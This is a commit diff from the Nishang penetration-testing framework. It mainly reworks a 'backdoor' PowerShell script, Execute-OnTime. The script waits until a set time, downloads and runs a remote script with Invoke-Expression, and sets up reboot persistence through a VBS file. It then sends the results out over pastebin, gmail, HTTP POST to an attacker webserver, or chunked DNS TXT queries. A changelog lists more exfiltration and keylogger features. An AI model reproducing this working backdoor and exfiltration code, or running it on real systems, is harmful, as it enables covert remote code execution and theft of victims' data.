Version 0.3.4

Nishang module added, run scripts with dot sourcing, more exfiltration options, leaner scripts etc.
samratashok · Jun 2, 2014 · afd809b · afd809b
1 parent ea15095
commit afd809b
Show file tree

Hide file tree

Showing 42 changed files with 1,233 additions and 1,049 deletions.
diff --git a/.gitignore b/.gitignore
@@ -213,3 +213,6 @@ pip-log.txt
 
 #Mr Developer
 .mr.developer.cfg
+
+#TODO
+TODO.txt
diff --git a/Backdoors/DNS_TXT_Pwnage.ps1 b/Backdoors/DNS_TXT_Pwnage.ps1
diff --git a/Backdoors/Execute-OnTime.ps1 b/Backdoors/Execute-OnTime.ps1
@@ -6,7 +6,7 @@ Nishang Payload which waits till given time to execute a script.
 This payload waits till the given time (on the victim)
 and then downloads a PowerShell script and executes it.
 
-.PARAMETER URL
+.PARAMETER PayloadURL
 The URL from where the file would be downloaded.
 
 .PARAMETER time
@@ -24,64 +24,117 @@ Use this parameter to achieve reboot persistence. Different methods of persisten
 PARAMETER exfil
 Use this parameter to use exfiltration methods for returning the results.
 
+.PARAMETER ExfilOption
+The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
+
 .PARAMETER dev_key
 The Unique API key provided by pastebin when you register a free account.
-Unused for tinypaste.
-Unused for gmail option.
+Unused for other options
 
 .PARAMETER username
-Username for the pastebin account where data would be pasted.
-Username for the tinypaste account where data would be pasted.
-Username for the gmail account where attachment would be sent as an attachment.
+Username for the pastebin/gmail account where data would be exfiltrated.
+Unused for other options
 
 .PARAMETER password
-Password for the pastebin account where data would be pasted.
-Password for the tinypaste account where data would be pasted.
-Password for the gmail account where data would be sent.
+Password for the pastebin/gmail account where data would be exfiltrated.
+Unused for other options
+
+.PARAMETER URL
+The URL of the webserver where POST requests would be sent.
 
-.PARAMETER keyoutoption
-The method you want to use for exfitration of data.
-"0" for displaying on console
-"1" for pastebin.
-"2" for gmail
-"3" for tinypaste   
+.PARAMETER DomainName
+The DomainName, whose subdomains would be used for sending TXT queries to.
+
+.PARAMETER AuthNS
+Authoritative Name Server for the domain specified in DomainName
 
 .EXAMPLE
-PS > .\Execute-OnTime.ps1 http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
+PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
 
 EXAMPLE
-PS > .\Execute-OnTime.ps1 http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil <devkey> <username> <password> <keyoutoption>
+PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
 
 Use above when using the payload from non-interactive shells.
 
 .EXAMPLE
-PS > .\Execute-OnTime.ps1 -persist
+PS > Execute-OnTime -persist
 
 Use above for reboot persistence.
 
 .LINK
-http://labofapenetrationtester.blogspot.com/
-http://code.google.com/p/nishang
+http://labofapenetrationtester.com/
+https://github.com/samratashok/nishang
 #>
 
 
 
-[CmdletBinding(DefaultParameterSetName="noexfil")]
-Param( [Parameter()] [Switch] $persist,
-[Parameter(Parametersetname="exfil")] [Switch] $exfil,
-[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")] [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")] [String] $URL,
-[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")] [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")] [String]$time,
-[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")] [Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")] [String]$CheckURL,
-[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")] [Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")] [String]$StopString,
-[Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")] [String]$dev_key,
-[Parameter(Position = 5, Mandatory = $True, Parametersetname="exfil")] [String]$username,
-[Parameter(Position = 6, Mandatory = $True, Parametersetname="exfil")] [String]$password,
-[Parameter(Position = 7, Mandatory = $True, Parametersetname="exfil")] [String]$keyoutoption )
+
 function Execute-OnTime
 {
+
+
+    [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
+        [Parameter(Parametersetname="exfil")]
+        [Switch]
+        $persist,
+
+        [Parameter(Parametersetname="exfil")]
+        [Switch]
+        $exfil,
+
+        [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
+        [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
+        [String]
+        $PayloadURL,
+
+        [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
+        [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
+        [String]
+        $time,
+
+        [Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
+        [Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
+        [String]
+        $CheckURL,
+
+        [Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
+        [Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
+        [String]
+        $StopString,
+
+
+        [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
+        [String]
+        $ExfilOption,
+
+        [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] 
+        [String]
+        $dev_key = "null",
+
+        [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
+        [String]
+        $username = "null",
+
+        [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
+        [String]
+        $password = "null",
+
+        [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
+        [String]
+        $URL = "null",
+
+        [Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
+        [String]
+        $DomainName = "null",
+
+        [Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
+        [String]
+        $AuthNS = "null"   
+
+   )
 
  $body = @'
-function Logic-Execute-OnTime ($URL, $time, $CheckURL, $StopString, $dev_key, $username, $password, $keyoutoption, $exfil)
+function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
 {
     $exec = 0
     while($true)
@@ -93,12 +146,12 @@ function Logic-Execute-OnTime ($URL, $time, $CheckURL, $StopString, $dev_key, $u
         if ($systime -match $time)
         {
             
-            $pastevalue = Invoke-Expression $webclient.DownloadString($URL)
+            $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
             $pastevalue
             $exec++
             if ($exfil -eq $True)
             {
-                Do-exfiltration
+                Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
             }
             if ($exec -eq 1)
             {
@@ -115,78 +168,98 @@ function Logic-Execute-OnTime ($URL, $time, $CheckURL, $StopString, $dev_key, $u
 
 
 
-
 $exfiltration = @'
-function Do-Exfiltration($pastename,$pastevalue,$username,$password,$dev_key,$keyoutoption,$filename)
+function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
+{
+    function post_http($url,$parameters) 
+    { 
+        $http_request = New-Object -ComObject Msxml2.XMLHTTP 
+        $http_request.open("POST", $url, $false) 
+        $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") 
+        $http_request.setRequestHeader("Content-length", $parameters.length); 
+        $http_request.setRequestHeader("Connection", "close") 
+        $http_request.send($parameters) 
+        $script:session_key=$http_request.responseText 
+    } 
+
+    function Compress-Encode
     {
-        function post_http($url,$parameters) 
-        { 
-            $http_request = New-Object -ComObject Msxml2.XMLHTTP 
-            $http_request.open("POST", $url, $false) 
-            $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") 
-            $http_request.setRequestHeader("Content-length", $parameters.length); 
-            $http_request.setRequestHeader("Connection", "close") 
-            $http_request.send($parameters) 
-            $script:session_key=$http_request.responseText 
-        } 
-
-        function Get-MD5()
-        {
-            #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell
-            $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
-            $utf8 = new-object -TypeName System.Text.UTF8Encoding
-            $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($password))).Replace("-", "").ToLower()
-            return $hash
-        }
+        #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
+        $ms = New-Object IO.MemoryStream
+        $action = [IO.Compression.CompressionMode]::Compress
+        $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
+        $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
+        $pastevalue | ForEach-Object {$sw.WriteLine($_)}
+        $sw.Close()
+        # Base64 encode stream
+        $code = [Convert]::ToBase64String($ms.ToArray())
+        $code
+    }
 
-        elseif ($keyoutoption -eq "1")
-        {
-            $utfbytes  = [System.Text.Encoding]::UTF8.GetBytes($pastevalue)
-            $pastevalue = [System.Convert]::ToBase64String($utfbytes)
-            post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" 
-            post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2" 
-        }
+    if ($exfiloption -eq "pastebin")
+    {
+        $utfbytes  = [System.Text.Encoding]::UTF8.GetBytes($Data)
+        $pastevalue = [System.Convert]::ToBase64String($utfbytes)
+        post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" 
+        post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2" 
+    }
         
-        elseif ($keyoutoption -eq "2")
+    elseif ($exfiloption -eq "gmail")
+    {
+        #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
+        $smtpserver = “smtp.gmail.com”
+        $msg = new-object Net.Mail.MailMessage
+        $smtp = new-object Net.Mail.SmtpClient($smtpServer )
+        $smtp.EnableSsl = $True
+        $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); 
+        $msg.From = “$username@gmail.com”
+        $msg.To.Add(”$username@gmail.com”)
+        $msg.Subject = $pastename
+        $msg.Body = $pastevalue
+        if ($filename)
         {
-            #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
-            $smtpserver = “smtp.gmail.com”
-            $msg = new-object Net.Mail.MailMessage
-            $smtp = new-object Net.Mail.SmtpClient($smtpServer )
-            $smtp.EnableSsl = $True
-            $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); 
-            $msg.From = “$username@gmail.com”
-            $msg.To.Add(”$username@gmail.com”)
-            $msg.Subject = $pastename
-            $msg.Body = $pastevalue
-            if ($filename)
-            {
-                $att = new-object Net.Mail.Attachment($filename)
-                $msg.Attachments.Add($att)
-            }
-            $smtp.Send($msg)
+            $att = new-object Net.Mail.Attachment($filename)
+            $msg.Attachments.Add($att)
         }
+        $smtp.Send($msg)
+    }
 
-        elseif ($keyoutoption -eq "3")
+    elseif ($exfiloption -eq "webserver")
+    {
+        $Data = Compress-Encode    
+        $Data
+        post_http $URL $Data
+    }
+    elseif ($ExfilOption -eq "DNS")
+    {
+        $lengthofsubstr = 0
+        $code = Compress-Encode
+        $queries = [int]($code.Length/63)
+        while ($queries -ne 0)
         {
-            
-            $hash = Get-MD5
-            post_http "http://tny.cz/api/create.xml" "paste=$pastevalue&title=$pastename&is_code=0&is_private=1&password=$dev_key&authenticate=$username`:$hash"
+            $querystring = $code.Substring($lengthofsubstr,63)
+            Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
+            $lengthofsubstr += 63
+            $queries -= 1
         }
+        $mod = $code.Length%63
+        $query = $code.Substring($code.Length - $mod, $mod)
+        Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
 
     }
+}
 '@
 
-    $modulename = $script:MyInvocation.MyCommand.Name
+    $modulename = "Execute-OnTime.ps1"
     if($persist -eq $True)
     {
 
         $name = "persist.vbs"
-        $options = "Logic-Execute-OnTime $URL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
+        $options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
 
         if ($exfil -eq $True)
         {
-            $options = "Logic-Execute-OnTime $URL $time $CheckURL $StopString"
+            $options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
         }
         Out-File -InputObject $body -Force $env:TEMP\$modulename
         Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
@@ -218,18 +291,14 @@ function Do-Exfiltration($pastename,$pastevalue,$username,$password,$dev_key,$ke
     }
     else
     {
-        $options = "Logic-Execute-OnTime $URL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
+        $options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
         if ($exfil -eq $True)
         {
-            $options = "Logic-Execute-OnTime $URL $time $CheckURL $StopString"
+            $options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
         }
         Out-File -InputObject $body -Force $env:TEMP\$modulename
         Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
         Out-File -InputObject $options -Append $env:TEMP\$modulename
         Invoke-Expression $env:TEMP\$modulename
     }
 }
-
-
-
-Execute-OnTime
diff --git a/Backdoors/HTTP-Backdoor.ps1 b/Backdoors/HTTP-Backdoor.ps1
diff --git a/CHANGELOG.txt b/CHANGELOG.txt
@@ -1,5 +1,16 @@
 0.3.4
 - Minor improvements in StringtoBase64.ps1
+- Fixed a typo in Firelistener. Client port was not being displayed.
+- All the scripts could be run using "dot source" now.
+- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
+- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
+- Removed exfiltration support for tinypaste.
+- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
+- Added Nishang.psm1
+- Added Do-Exfiltration.ps1.
+- Added Add-Exfiltration.ps1.
+- Added Invoke-Decode.ps1.
+- Removed Browse_Accept_Applet.ps1
 0.3.3
 - Minor bug fix in Copy-VSS.ps1
 - Bug fix in Keylogger.ps1. It should log keys from a remote shell now (not powershell remoting).